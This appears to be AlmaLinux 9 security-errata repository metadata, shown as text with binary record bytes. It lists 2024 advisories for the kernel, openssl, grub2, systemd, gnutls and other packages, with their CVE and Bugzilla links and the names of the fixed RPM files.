-2024-50255CVE-2024-50255CVE-2024-50255https://access.redhat.com/security/cve/CVE-2024-50262CVE-2024-50262CVE-2024-50262https://bugzilla.redhat.com/22804622280462https://bugzilla.redhat.com/22934292293429https://bugzilla.redhat.com/23117172311717https://bugzilla.redhat.com/23120852312085https://bugzilla.redhat.com/23202542320254https://bugzilla.redhat.com/23205172320517https://bugzilla.redhat.com/23239042323904https://bugzilla.redhat.com/23239302323930https://bugzilla.redhat.com/23239372323937https://bugzilla.redhat.com/23239442323944https://bugzilla.redhat.com/23239552323955https://bugzilla.redhat.com/23243152324315https://bugzilla.redhat.com/23243322324332https://bugzilla.redhat.com/23246122324612https://bugzilla.redhat.com/23248672324867https://bugzilla.redhat.com/23248682324868https://bugzilla.redhat.com/23248922324892https://errata.almalinux.org/9/ALSA-2024-11486.htmlALSA-2024:11486ALSA-2024:114866kernel-abi-stablelists-5.14.0-503.19.1.el9_5.noarch.rpm1�Mbpftool-7.4.0-503.19.1.el9_5.x86_64.rpm6kernel-modules-extra-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-extra-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-core-5.14.0-503.19.1.el9_5.x86_64.rpm"6kernel-uki-virt-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-modules-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-tools-5.14.0-503.19.1.el9_5.x86_64.rpm26python3-perf-5.14.0-503.19.1.el9_5.x86_64.rpm%6kernel-uki-virt-addons-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-core-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-tools-libs-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-core-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-5.14.0-503.19.1.el9_5.x86_64.rpm!6kernel-modules-core-5.14.0-503.19.1.el9_5.x86_64.rpm 6kernel-debug-uki-virt-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-abi-stablelists-5.14.0-503.19.1.el9_5.noarch.rpm1�Mbpftool-7.4.0-503.19.1.el9_5.x86_64.rpm6kernel-modules-extra-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-extra-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-core-5.14.0-503.19.1.el9_5.x86_64.rpm"6kernel-uki-virt-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-modules-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-tools-5.14.0-503.19.1.el9_5.x86_64.rpm26python3-perf-5.14.0-503.19.1.el9_5.x86_64.rpm%6kernel-uki-virt-addons-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-core-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-tools-libs-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-core-5.14.0-503.19.1.el9_5.x86_64.rpm6kernel-debug-modules-5.14.0-503.19.1.el9_5.x86_64.rpm!6kernel-modules-core-5.14.0-503.19.1.el9_5.x86_64.rpm 6kernel-debug-uki-virt-5.14.0-503.19.1.el9_5.x86_64.rpm����m�9
�)�`BBBBBBBsecurityModerate: opencryptoki security update,��_�Whttps://access.redhat.com/errata/RHSA-2024:1239RHSA-2024:1239RHSA-2024:1239https://access.redhat.com/security/cve/CVE-2024-0914CVE-2024-0914CVE-2024-0914https://bugzilla.redhat.com/22604072260407https://errata.almalinux.org/9/ALSA-2024-1239.htmlALSA-2024:1239ALSA-2024:1239�2�Wopencryptoki-libs-3.21.0-9.el9_3.alma.1.i686.rpm�2�Wopencryptoki-libs-3.21.0-9.el9_3.alma.1.x86_64.rpm�u�Wopencryptoki-swtok-3.21.0-9.el9_3.alma.1.x86_64.rpm�t�Wopencryptoki-icsftok-3.21.0-9.el9_3.alma.1.x86_64.rpm�s�Wopencryptoki-3.21.0-9.el9_3.alma.1.x86_64.rpm�2�Wopencryptoki-libs-3.21.0-9.el9_3.alma.1.i686.rpm�2�Wopencryptoki-libs-3.21.0-9.el9_3.alma.1.x86_64.rpm�u�Wopencryptoki-swtok-3.21.0-9.el9_3.alma.1.x86_64.rpm�t�Wopencryptoki-icsftok-3.21.0-9.el9_3.alma.1.x86_64.rpm�s�Wopencryptoki-3.21.0-9.el9_3.alma.1.x86_64.rpm����E�:
��jBsecurityModerate: expat security update,��6�Bhttps://access.redhat.com/errata/RHSA-2024:1530RHSA-2024:1530RHSA-2024:1530https://access.redhat.com/security/cve/CVE-2023-52425CVE-2023-52425CVE-2023-52425https://access.redhat.com/security/cve/CVE-2024-28757CVE-2024-28757CVE-2024-28757https://bugzilla.redhat.com/22628772262877https://bugzilla.redhat.com/22687662268766https://errata.almalinux.org/9/ALSA-2024-1530.htmlALSA-2024:1530ALSA-2024:1530�"�vexpat-2.5.0-1.el9_3.1.x86_64.rpm�"�vexpat-2.5.0-1.el9_3.1.i686.rpm�"�vexpat-2.5.0-1.el9_3.1.x86_64.rpm�"�vexpat-2.5.0-1.el9_3.1.i686.rpm�����;
�/�msecurityModerate: less security update,��x�#https://access.redhat.com/errata/RHSA-2024:1692RHSA-2024:1692RHSA-2024:1692https://access.redhat.com/security/cve/CVE-2022-48624CVE-2022-48624CVE-2022-48624https://bugzilla.redhat.com/22650812265081https://errata.almalinux.org/9/ALSA-2024-1692.htmlALSA-2024:1692ALSA-2024:1692�R�7less-590-3.el9_3.x86_64.rpm�R�7less-590-3.el9_3.x86_64.rpm����|�<
��pBsecurityModerate: gnutls security update,���https://access.redhat.com/errata/RHSA-2024:1879RHSA-2024:1879RHSA-2024:1879https://access.redhat.com/security/cve/CVE-2024-28834CVE-2024-28834CVE-2024-28834https://access.redhat.com/security/cve/CVE-2024-28835CVE-2024-28835CVE-2024-28835https://bugzilla.redhat.com/22690842269084https://bugzilla.redhat.com/22692282269228https://errata.almalinux.org/9/ALSA-2024-1879.htmlALSA-2024:1879ALSA-2024:1879�#�gnutls-3.7.6-23.el9_3.4.i686.rpm�#�gnutls-3.7.6-23.el9_3.4.x86_64.rpm�#�gnutls-3.7.6-23.el9_3.4.i686.rpm�#�gnutls-3.7.6-23.el9_3.4.x86_64.rpm�����=
�5�ssecurityImportant: shim bug fix update,'��-�Mhttps://access.redhat.com/errata/RHSA-2024:1903RHSA-2024:1903RHSA-2024:1903https://access.redhat.com/security/cve/CVE-2023-40546CVE-2023-40546CVE-2023-40546https://access.redhat.com/security/cve/CVE-2023-40547CVE-2023-40547CVE-2023-40547https://access.redhat.com/security/cve/CVE-2023-40548CVE-2023-40548CVE-2023-40548https://access.redhat.com/security/cve/CVE-2023-40549CVE-2023-40549CVE-2023-40549https://access.redhat.com/security/cve/CVE-2023-40550CVE-2023-40550CVE-2023-40550https://access.redhat.com/security/cve/CVE-2023-40551CVE-2023-40551CVE-2023-40551https://bugzilla.redhat.com/22345892234589https://bugzilla.redhat.com/22417822241782https://bugzilla.redhat.com/22417962241796https://bugzilla.redhat.com/22417972241797https://bugzilla.redhat.com/22599152259915https://bugzilla.redhat.com/22599182259918https://errata.almalinux.org/9/ALSA-2024-1903.htmlALSA-2024:1903ALSA-2024:1903��shim-x64-15.8-4.el9_3.alma.1.x86_64.rpm��shim-x64-15.8-4.el9_3.alma.1.x86_64.rpm����x�>
��vBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security, bug fix, and enhancement update,'��z�%zhttps://access.redhat.com/errata/RHSA-2024:2394RHSA-2024:2394RHSA-2024:2394https://bugzilla.redhat.com/19186011918601https://bugzilla.redhat.com/20497002049700https://bugzilla.redhat.com/21334522133452https://bugzilla.redhat.com/21519592151959https://bugzilla.redhat.com/21777592177759https://bugzilla.redhat.com/21855192185519https://bugzilla.redhat.com/21881022188102https://bugzilla.redhat.com/22100242210024https://bugzilla.redhat.com/22131322213132https://bugzilla.redhat.com/22183322218332https://bugzilla.redhat.com/22193592219359https://bugzilla.redhat.com/22210392221039https://bugzilla.redhat.com/22214632221463https://bugzilla.redhat.com/22217022221702https://bugzilla.redhat.com/22267772226777https://bugzilla.redhat.com/22267872226787https://bugzilla.redhat.com/22267882226788https://bugzilla.redhat.com/22314102231410https://bugzilla.redhat.com/22398452239845https://bugzilla.redhat.com/22398482239848https://bugzilla.redhat.com/22447202244720https://bugzilla.redhat.com/22469802246980https://bugzilla.redhat.com/22500432250043https://bugzilla.redhat.com/22527312252731https://bugzilla.redhat.com/22530342253034https://bugzilla.redhat.com/22536322253632https://bugzilla.redhat.com/22549612254961https://bugzilla.redhat.com/22549822254982https://bugzilla.redhat.com/22552832255283https://bugzilla.redhat.com/22554982255498https://bugzilla.redhat.com/22564902256490https://bugzilla.redhat.com/22568222256822https://bugzilla.redhat.com/22576822257682https://bugzilla.redhat.com/22580132258013https://bugzilla.redhat.com/22585182258518https://bugzilla.redhat.com/22600052260005https://bugzilla.redhat.com/22621262262126https://bugzilla.redhat.com/22621272262127https://bugzilla.redhat.com/22652852265285https://bugzilla.redhat.com/22655172265517https://bugzilla.redhat.com/22655182265518https://bugzilla.redhat.com/22655192265519https://bugzilla.redhat.com/22655202265520https://bugzilla.redhat.com/22656452265645https://bugzilla.redhat.com/22656462265646https://bugzilla.redhat.com/22656532265653https://bugzilla.redhat.com/22670412267041https://bugzilla.redhat.com/22676952267695https://bugzilla.redhat.com/22677502267750https://bugzilla.redhat.com/22677582267758https://bugzilla.redhat.com/22677602267760https://bugzilla.redhat.com/22677612267761https://bugzilla.redhat.com/22677882267788https://bugzilla.redhat.com/22677952267795https://bugzilla.redhat.com/22691892269189https://bugzilla.redhat.com/22692172269217https://bugzilla.redhat.com/22700802270080https://bugzilla.redhat.com/22701182270118https://bugzilla.redhat.com/22708832270883https://errata.almalinux.org/9/ALSA-2024-2394.htmlALSA-2024:2394ALSA-2024:2394https://www.redhat.com/security/data/cve/CVE-2020-26555.htmlCVE-2020-26555CVE-2020-26555https://www.redhat.com/security/data/cve/CVE-2022-0480.htmlCVE-2022-0480CVE-2022-0480https://www.redhat.com/security/data/cve/CVE-2022-38096.htmlCVE-2022-38096CVE-2022-38096https://www.redhat.com/security/data/cve/CVE-2022-45934.htmlCVE-2022-45934CVE-2022-45934https://www.redhat.com/security/data/cve/CVE-2023-24023.htmlCVE-2023-24023CVE-2023-24023https://www.redhat.com/security/data/cve/CVE-2023-25775.htmlCVE-2023-25775CVE-2023-25775https://www.redhat.com/security/data/cve/CVE-2023-28464.htmlCVE-2023-28464CVE-2023-28464https://www.redhat.com/security/data/cve/CVE-2023-28866.htmlCVE-2023-28866CVE-2023-28866https://www.redhat.com/security/data/cve/CVE-2023-31083.htmlCVE-2023-31083CVE-2023-31083https://www.redhat.com/security/data/cve/CVE-2023-3567.htmlCVE-2023-3567CVE-2023-3567https://www.redhat.com/security/data/cve/CVE-2023-37453.htmlCVE-2023-37453CVE-2023-37453https://www.redhat.com/security/data/cve/CVE-2023-39189.htmlCVE-2023-39189CVE-2023-39189https://www.redhat.com/security/data/cve/CVE-2023-39193.htmlCVE-2023-39193CVE-2023-39193https://www.redhat.com/security/data/cve/CVE-2023-39194.htmlCVE-2023-39194CVE-2023-39194https://www.redhat.com/security/data/cve/CVE-2023-39198.htmlCVE-2023-39198CVE-2023-39198https://www.redhat.com/security/data/cve/CVE-2023-4133.htmlCVE-2023-4133CVE-2023-4133https://www.redhat.com/security/data/cve/CVE-2023-42754.htmlCVE-2023-42754CVE-2023-42754https://www.redhat.com/security/data/cve/CVE-2023-42756.htmlCVE-2023-42756CVE-2023-42756https://www.redhat.com/security/data/cve/CVE-2023-45863.htmlCVE-2023-45863CVE-2023-45863https://www.redhat.com/security/data/cve/CVE-2023-46862.htmlCVE-2023-46862CVE-2023-46862https://www.redhat.com/security/data/cve/CVE-2023-51043.htmlCVE-2023-51043CVE-2023-51043https://www.redhat.com/security/data/cve/CVE-2023-51779.htmlCVE-2023-51779CVE-2023-51779https://www.redhat.com/security/data/cve/CVE-2023-51780.htmlCVE-2023-51780CVE-2023-51780https://www.redhat.com/security/data/cve/CVE-2023-52434.htmlCVE-2023-52434CVE-2023-52434https://www.redhat.com/security/data/cve/CVE-2023-52448.htmlCVE-2023-52448CVE-2023-52448https://www.redhat.com/security/data/cve/CVE-2023-52450.htmlCVE-2023-52450CVE-2023-52450https://www.redhat.com/security/data/cve/CVE-2023-52476.htmlCVE-2023-52476CVE-2023-52476https://www.redhat.com/security/data/cve/CVE-2023-52489.htmlCVE-2023-52489CVE-2023-52489https://www.redhat.com/security/data/cve/CVE-2023-52522.htmlCVE-2023-52522CVE-2023-52522https://www.redhat.com/security/data/cve/CVE-2023-52529.htmlCVE-2023-52529CVE-2023-52529https://www.redhat.com/security/data/cve/CVE-2023-52574.htmlCVE-2023-52574CVE-2023-52574https://www.redhat.com/security/data/cve/CVE-2023-52578.htmlCVE-2023-52578CVE-2023-52578https://www.redhat.com/security/data/cve/CVE-2023-52580.htmlCVE-2023-52580CVE-2023-52580https://www.redhat.com/security/data/cve/CVE-2023-52581.htmlCVE-2023-52581CVE-2023-52581https://www.redhat.com/security/data/cve/CVE-2023-52597.htmlCVE-2023-52597CVE-2023-52597https://www.redhat.com/security/data/cve/CVE-2023-52610.htmlCVE-2023-52610CVE-2023-52610https://www.redhat.com/security/data/cve/CVE-2023-52620.htmlCVE-2023-52620CVE-2023-52620https://www.redhat.com/security/data/cve/CVE-2023-6040.htmlCVE-2023-6040CVE-2023-6040https://www.redhat.com/security/data/cve/CVE-2023-6121.htmlCVE-2023-6121CVE-2023-6121https://www.redhat.com/security/data/cve/CVE-2023-6176.htmlCVE-2023-6176CVE-2023-6176https://www.redhat.com/security/data/cve/CVE-2023-6531.htmlCVE-2023-6531CVE-2023-6531https://www.redhat.com/security/data/cve/CVE-2023-6546.htmlCVE-2023-6546CVE-2023-6546https://www.redhat.com/security/data/cve/CVE-2023-6622.htmlCVE-2023-6622CVE-2023-6622https://www.redhat.com/security/data/cve/CVE-2023-6915.htmlCVE-2023-6915CVE-2023-6915https://www.redhat.com/security/data/cve/CVE-2023-6931.htmlCVE-2023-6931CVE-2023-6931https://www.redhat.com/security/data/cve/CVE-2023-6932.htmlCVE-2023-6932CVE-2023-6932https://www.redhat.com/security/data/cve/CVE-2024-0565.htmlCVE-2024-0565CVE-2024-0565https://www.redhat.com/security/data/cve/CVE-2024-0841.htmlCVE-2024-0841CVE-2024-0841https://www.redhat.com/security/data/cve/CVE-2024-1085.htmlCVE-2024-1085CVE-2024-1085https://www.redhat.com/security/data/cve/CVE-2024-1086.htmlCVE-2024-1086CVE-2024-1086https://www.redhat.com/security/data/cve/CVE-2024-25744.htmlCVE-2024-25744CVE-2024-25744https://www.redhat.com/security/data/cve/CVE-2024-26582.htmlCVE-2024-26582CVE-2024-26582https://www.redhat.com/security/data/cve/CVE-2024-26583.htmlCVE-2024-26583CVE-2024-26583https://www.redhat.com/security/data/cve/CVE-2024-26584.htmlCVE-2024-26584CVE-2024-26584https://www.redhat.com/security/data/cve/CVE-2024-26585.htmlCVE-2024-26585CVE-2024-26585https://www.redhat.com/security/data/cve/CVE-2024-26586.htmlCVE-2024-26586CVE-2024-26586https://www.redhat.com/security/data/cve/CVE-2024-26593.htmlCVE-2024-26593CVE-2024-26593https://www.redhat.com/security/data/cve/CVE-2024-26602.htmlCVE-2024-26602CVE-2024-26602https://www.redhat.com/security/data/cve/CVE-2024-26609.htmlCVE-2024-26609CVE-2024-26609https://www.redhat.com/security/data/cve/CVE-2024-26633.htmlCVE-2024-26633CVE-2024-26633https://www.redhat.com/security/data/cve/CVE-2024-26671.htmlCVE-2024-26671CVE-2024-26671Ckernel-5.14.0-427.13.1.el9_4.x86_64.rpm!Ckernel-modules-core-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-abi-stablelists-5.14.0-427.13.1.el9_4.noarch.rpmCkernel-debug-modules-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-tools-libs-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-modules-core-5.14.0-427.13.1.el9_4.x86_64.rpm Ckernel-debug-uki-virt-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-core-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-tools-5.14.0-427.13.1.el9_4.x86_64.rpm2Cpython3-perf-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-modules-extra-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-modules-extra-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-modules-5.14.0-427.13.1.el9_4.x86_64.rpm"Ckernel-uki-virt-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-core-5.14.0-427.13.1.el9_4.x86_64.rpm1�=bpftool-7.3.0-427.13.1.el9_4.x86_64.rpmCkernel-5.14.0-427.13.1.el9_4.x86_64.rpm!Ckernel-modules-core-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-abi-stablelists-5.14.0-427.13.1.el9_4.noarch.rpmCkernel-debug-modules-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-tools-libs-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-modules-core-5.14.0-427.13.1.el9_4.x86_64.rpm Ckernel-debug-uki-virt-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-core-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-tools-5.14.0-427.13.1.el9_4.x86_64.rpm2Cpython3-perf-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-modules-extra-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-modules-extra-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-debug-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-modules-5.14.0-427.13.1.el9_4.x86_64.rpm"Ckernel-uki-virt-5.14.0-427.13.1.el9_4.x86_64.rpmCkernel-core-5.14.0-427.13.1.el9_4.x86_64.rpm1�=bpftool-7.3.0-427.13.1.el9_4.x86_64.rpm����'�?
��WsecurityModerate: squashfs-tools security update,���https://access.redhat.com/errata/RHSA-2024:2396RHSA-2024:2396RHSA-2024:2396https://access.redhat.com/security/cve/CVE-2021-40153CVE-2021-40153CVE-2021-40153https://access.redhat.com/security/cve/CVE-2021-41072CVE-2021-41072CVE-2021-41072https://bugzilla.redhat.com/19986211998621https://bugzilla.redhat.com/20049572004957https://errata.almalinux.org/9/ALSA-2024-2396.htmlALSA-2024:2396ALSA-2024:2396�{�2squashfs-tools-4.4-10.git1.el9.x86_64.rpm�{�2squashfs-tools-4.4-10.git1.el9.x86_64.rpm����@
��ZBsecurityModerate: harfbuzz security update,��>�{https://access.redhat.com/errata/RHSA-2024:2410RHSA-2024:2410RHSA-2024:2410https://access.redhat.com/security/cve/CVE-2023-25193CVE-2023-25193CVE-2023-25193https://bugzilla.redhat.com/21672542167254https://errata.almalinux.org/9/ALSA-2024-2410.htmlALSA-2024:2410ALSA-2024:2410�)�harfbuzz-2.7.4-10.el9.x86_64.rpm�)�harfbuzz-2.7.4-10.el9.i686.rpm�)�harfbuzz-2.7.4-10.el9.x86_64.rpm�)�harfbuzz-2.7.4-10.el9.i686.rpm����A
��]BBBBsecurityModerate: avahi security update,��9�Ohttps://access.redhat.com/errata/RHSA-2024:2433RHSA-2024:2433RHSA-2024:2433https://access.redhat.com/security/cve/CVE-2023-38469CVE-2023-38469CVE-2023-38469https://access.redhat.com/security/cve/CVE-2023-38470CVE-2023-38470CVE-2023-38470https://access.redhat.com/security/cve/CVE-2023-38471CVE-2023-38471CVE-2023-38471https://access.redhat.com/security/cve/CVE-2023-38472CVE-2023-38472CVE-2023-38472https://access.redhat.com/security/cve/CVE-2023-38473CVE-2023-38473CVE-2023-38473https://bugzilla.redhat.com/21916872191687https://bugzilla.redhat.com/21916902191690https://bugzilla.redhat.com/21916912191691https://bugzilla.redhat.com/21916922191692https://bugzilla.redhat.com/21916942191694https://errata.almalinux.org/9/ALSA-2024-2433.htmlALSA-2024:2433ALSA-2024:2433��avahi-libs-0.8-20.el9.x86_64.rpm��avahi-0.8-20.el9.x86_64.rpm��avahi-libs-0.8-20.el9.i686.rpm��avahi-0.8-20.el9.i686.rpm��avahi-libs-0.8-20.el9.x86_64.rpm��avahi-0.8-20.el9.x86_64.rpm��avahi-libs-0.8-20.el9.i686.rpm��avahi-0.8-20.el9.i686.rpm����B
�%�csecurityModerate: exfatprogs security update,���https://access.redhat.com/errata/RHSA-2024:2437RHSA-2024:2437RHSA-2024:2437https://access.redhat.com/security/cve/CVE-2023-45897CVE-2023-45897CVE-2023-45897https://bugzilla.redhat.com/22469762246976https://errata.almalinux.org/9/ALSA-2024-2437.htmlALSA-2024:2437ALSA-2024:2437�\�exfatprogs-1.2.2-2.el9.x86_64.rpm�\�exfatprogs-1.2.2-2.el9.x86_64.rpm����C
��fBsecurityModerate: pam security update,���Ohttps://access.redhat.com/errata/RHSA-2024:2438RHSA-2024:2438RHSA-2024:2438https://access.redhat.com/security/cve/CVE-2024-22365CVE-2024-22365CVE-2024-22365https://bugzilla.redhat.com/22577222257722https://errata.almalinux.org/9/ALSA-2024-2438.htmlALSA-2024:2438ALSA-2024:2438�B�cpam-1.5.1-19.el9.x86_64.rpm�B�cpam-1.5.1-19.el9.i686.rpm�B�cpam-1.5.1-19.el9.x86_64.rpm�B�cpam-1.5.1-19.el9.i686.rpm���
�D
��iBBBsecurityLow: openssl and openssl-fips-provider security update,�9��_�/https://access.redhat.com/errata/RHSA-2024:2447RHSA-2024:2447RHSA-2024:2447https://access.redhat.com/security/cve/CVE-2023-2975CVE-2023-2975CVE-2023-2975https://access.redhat.com/security/cve/CVE-2023-3446CVE-2023-3446CVE-2023-3446https://access.redhat.com/security/cve/CVE-2023-3817CVE-2023-3817CVE-2023-3817https://access.redhat.com/security/cve/CVE-2023-5678CVE-2023-5678CVE-2023-5678https://access.redhat.com/security/cve/CVE-2023-6129CVE-2023-6129CVE-2023-6129https://access.redhat.com/security/cve/CVE-2023-6237CVE-2023-6237CVE-2023-6237https://access.redhat.com/security/cve/CVE-2024-0727CVE-2024-0727CVE-2024-0727https://bugzilla.redhat.com/22230162223016https://bugzilla.redhat.com/22249622224962https://bugzilla.redhat.com/22278522227852https://bugzilla.redhat.com/22486162248616https://bugzilla.redhat.com/22575712257571https://bugzilla.redhat.com/22585022258502https://bugzilla.redhat.com/22599442259944https://errata.almalinux.org/9/ALSA-2024-2447.htmlALSA-2024:2447ALSA-2024:2447��wopenssl-libs-3.0.7-27.el9.i686.rpm��wopenssl-libs-3.0.7-27.el9.x86_64.rpm�:�wopenssl-3.0.7-27.el9.x86_64.rpm��wopenssl-libs-3.0.7-27.el9.i686.rpm��wopenssl-libs-3.0.7-27.el9.x86_64.rpm�:�wopenssl-3.0.7-27.el9.x86_64.rpm����E
��nBBBBBBBBBBBBBBBBsecurityModerate: grub2 security update,���Thttps://access.redhat.com/errata/RHSA-2024:2456RHSA-2024:2456RHSA-2024:2456https://access.redhat.com/security/cve/CVE-2023-4692CVE-2023-4692CVE-2023-4692https://access.redhat.com/security/cve/CVE-2023-4693CVE-2023-4693CVE-2023-4693https://access.redhat.com/security/cve/CVE-2024-1048CVE-2024-1048CVE-2024-1048https://bugzilla.redhat.com/22366132236613https://bugzilla.redhat.com/22383432238343https://bugzilla.redhat.com/22568272256827https://errata.almalinux.org/9/ALSA-2024-2456.htmlALSA-2024:2456ALSA-2024:2456�?�grub2-pc-modules-2.06-77.el9.alma.1.noarch.rpm�l�grub2-tools-2.06-77.el9.alma.1.x86_64.rpm�k�grub2-pc-2.06-77.el9.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-77.el9.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-77.el9.alma.1.x86_64.rpm�j�grub2-efi-x64-cdboot-2.06-77.el9.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-77.el9.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-77.el9.alma.1.noarch.rpm�=�grub2-efi-aa64-modules-2.06-77.el9.alma.1.noarch.rpm�<�grub2-common-2.06-77.el9.alma.1.noarch.rpm�o�grub2-tools-minimal-2.06-77.el9.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-77.el9.alma.1.noarch.rpm�l�grub2-tools-2.06-77.el9.alma.1.x86_64.rpm�k�grub2-pc-2.06-77.el9.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-77.el9.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-77.el9.alma.1.x86_64.rpm�j�grub2-efi-x64-cdboot-2.06-77.el9.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-77.el9.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-77.el9.alma.1.noarch.rpm�=�grub2-efi-aa64-modules-2.06-77.el9.alma.1.noarch.rpm�<�grub2-common-2.06-77.el9.alma.1.noarch.rpm�o�grub2-tools-minimal-2.06-77.el9.alma.1.x86_64.rpm���F�F
��ABBBBBBBBBBBBBBBBBsecurityModerate: systemd security update,��b�https://access.redhat.com/errata/RHSA-2024:2463RHSA-2024:2463RHSA-2024:2463https://access.redhat.com/security/cve/CVE-2023-7008CVE-2023-7008CVE-2023-7008https://bugzilla.redhat.com/22226722222672https://errata.almalinux.org/9/ALSA-2024-2463.htmlALSA-2024:2463ALSA-2024:2463�}�rhel-net-naming-sysattrs-252-32.el9_4.alma.1.noarch.rpm�^�systemd-container-252-32.el9_4.alma.1.i686.rpm�E�systemd-udev-252-32.el9_4.alma.1.x86_64.rpm�B�systemd-oomd-252-32.el9_4.alma.1.x86_64.rpm�]�systemd-252-32.el9_4.alma.1.x86_64.rpm�_�systemd-libs-252-32.el9_4.alma.1.i686.rpm�_�systemd-libs-252-32.el9_4.alma.1.x86_64.rpm�]�systemd-252-32.el9_4.alma.1.i686.rpm�C�systemd-pam-252-32.el9_4.alma.1.x86_64.rpm�^�systemd-container-252-32.el9_4.alma.1.x86_64.rpm�D�systemd-resolved-252-32.el9_4.alma.1.x86_64.rpm�p�systemd-rpm-macros-252-32.el9_4.alma.1.noarch.rpm�}�rhel-net-naming-sysattrs-252-32.el9_4.alma.1.noarch.rpm�^�systemd-container-252-32.el9_4.alma.1.i686.rpm�E�systemd-udev-252-32.el9_4.alma.1.x86_64.rpm�B�systemd-oomd-252-32.el9_4.alma.1.x86_64.rpm�]�systemd-252-32.el9_4.alma.1.x86_64.rpm�_�systemd-libs-252-32.el9_4.alma.1.i686.rpm�_�systemd-libs-252-32.el9_4.alma.1.x86_64.rpm�]�systemd-252-32.el9_4.alma.1.i686.rpm�C�systemd-pam-252-32.el9_4.alma.1.x86_64.rpm�^�systemd-container-252-32.el9_4.alma.1.x86_64.rpm�D�systemd-resolved-252-32.el9_4.alma.1.x86_64.rpm�p�systemd-rpm-macros-252-32.el9_4.alma.1.noarch.rpm����G
��TsecurityModerate: traceroute security update,��c�https://access.redhat.com/errata/RHSA-2024:2483RHSA-2024:2483RHSA-2024:2483https://access.redhat.com/security/cve/CVE-2023-46316CVE-2023-46316CVE-2023-46316https://bugzilla.redhat.com/22463032246303https://errata.almalinux.org/9/ALSA-2024-2483.htmlALSA-2024:2483ALSA-2024:2483��0traceroute-2.1.0-18.el9.x86_64.rpm��0traceroute-2.1.0-18.el9.x86_64.rpm����H
��WBBsecurityLow: libssh security update,�9��v�https://access.redhat.com/errata/RHSA-2024:2504RHSA-2024:2504RHSA-2024:2504https://access.redhat.com/security/cve/CVE-2023-6004CVE-2023-6004CVE-2023-6004https://access.redhat.com/security/cve/CVE-2023-6918CVE-2023-6918CVE-2023-6918https://bugzilla.redhat.com/22511102251110https://bugzilla.redhat.com/22549972254997https://errata.almalinux.org/9/ALSA-2024-2504.htmlALSA-2024:2504ALSA-2024:2504�A�7libssh-0.10.4-13.el9.x86_64.rpm��7libssh-config-0.10.4-13.el9.noarch.rpm�A�7libssh-0.10.4-13.el9.i686.rpm�A�7libssh-0.10.4-13.el9.x86_64.rpm��7libssh-config-0.10.4-13.el9.noarch.rpm�A�7libssh-0.10.4-13.el9.i686.rpm���'�I
��[BBBsecurityLow: file security update,�9��~�Bhttps://access.redhat.com/errata/RHSA-2024:2512RHSA-2024:2512RHSA-2024:2512https://access.redhat.com/security/cve/CVE-2022-48554CVE-2022-48554CVE-2022-48554https://bugzilla.redhat.com/22357142235714https://errata.almalinux.org/9/ALSA-2024-2512.htmlALSA-2024:2512ALSA-2024:2512�'�#file-libs-5.39-16.el9.x86_64.rpm�^�#file-5.39-16.el9.x86_64.rpm�'�#file-libs-5.39-16.el9.i686.rpm�'�#file-libs-5.39-16.el9.x86_64.rpm�^�#file-5.39-16.el9.x86_64.rpm�'�#file-libs-5.39-16.el9.i686.rpm����J
�"�`securityModerate: wpa_supplicant security update,��@�bhttps://access.redhat.com/errata/RHSA-2024:2517RHSA-2024:2517RHSA-2024:2517https://access.redhat.com/security/cve/CVE-2023-52160CVE-2023-52160CVE-2023-52160https://bugzilla.redhat.com/22645932264593https://errata.almalinux.org/9/ALSA-2024-2517.htmlALSA-2024:2517ALSA-2024:2517��wpa_supplicant-2.10-5.el9.x86_64.rpm��wpa_supplicant-2.10-5.el9.x86_64.rpm����K
